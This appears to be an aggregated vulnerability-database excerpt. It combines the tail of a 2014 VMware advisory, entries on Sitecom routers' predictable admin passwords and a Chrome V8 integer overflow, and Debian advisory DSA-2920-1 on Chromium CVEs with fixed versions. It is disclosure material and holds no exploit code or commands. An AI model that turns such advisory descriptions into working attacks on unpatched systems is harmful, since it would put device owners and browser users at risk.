Initial security advisory in conjunction with the release of vCenter
Operations Management Suite 5.8.2 on 2014-06-24.
- ------------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
security-announce at lists.vmware.com
bugtraq at securityfocus.com
fulldisclosure at seclists.org
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware Security Response Policy
https://www.vmware.com/support/policies/security_response.html
VMware Lifecycle Support Phases
https://www.vmware.com/support/policies/lifecycle.html
Twitter
https://twitter.com/VMwareSRC
Copyright 2014 VMware Inc. All rights reserved.
| VAR-201406-0502 | No CVE | Multiple Sitecom Products Admin Password Key Security Restriction Bypass Vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
SITECOM WLR-4000/WLR-4004 is a router. Multiple Sitecom products are prone to an admin password key security restriction bypass vulnerability because the devices generate administrative passwords and WPA2 passphrases in a predictable way. This allows remote attackers to more easily obtain this information and potentially access the device. This may lead to other attacks.
The following products are vulnerable:
Sitecom WLR-4000 v1 001
Sitecom WLR-4004 v1 001
| VAR-201405-0267 | CVE-2014-1736 | Google V8 api.cc integer overflow vulnerability, as used in Google Chrome on multiple operating systems |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Integer overflow in api.cc in Google V8, as used in Google Chrome before 34.0.1847.131 on Windows and OS X and before 34.0.1847.132 on Linux, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a large length value. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Google Chrome. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of ImageData objects. In certain conditions, an attacker would be able to read and write pixel data. An attacker can leverage this vulnerability to execute code under the context of the current process. Failed exploit attempts may result in a denial-of-service condition.
Versions prior to Chrome 34.0.1847.131 and 34.0.1847.132 are vulnerable. Google Chrome is a web browser developed by Google (Google). An integer overflow vulnerability exists in the api.cc file of Google V8.
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2920-1 security@debian.org
http://www.debian.org/security/ Michael Gilbert
May 03, 2014 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : chromium-browser
CVE ID : CVE-2014-1730 CVE-2014-1731 CVE-2014-1732 CVE-2014-1733
CVE-2014-1734 CVE-2014-1735 CVE-2014-1736
Several vulnerabilities have been discovered in the chromium web browser.
CVE-2014-1730
A type confusion issue was discovered in the v8 javascript library.
CVE-2014-1731
John Butler discovered a type confusion issue in the WebKit/Blink
document object model implementation.
CVE-2014-1732
Khalil Zhani discovered a use-after-free issue in the speech
recognition feature.
CVE-2014-1733
Jed Davis discovered a way to bypass the seccomp-bpf sandbox.
CVE-2014-1734
The Google Chrome development team discovered and fixed multiple
issues with potential security impact.
CVE-2014-1735
The Google Chrome development team discovered and fixed multiple
issues in version 3.24.35.33 of the v8 javascript library.
CVE-2014-1736
SkyLined discovered an integer overflow issue in the v8 javascript
library.
For the stable distribution (wheezy), these problems have been fixed in
version 34.0.1847.132-1~deb7u1.
For the testing distribution (jessie), these problems will be fixed soon.
For the unstable distribution (sid), these problems have been fixed in
version 34.0.1847.132-1.
We recommend that you upgrade your chromium-browser packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org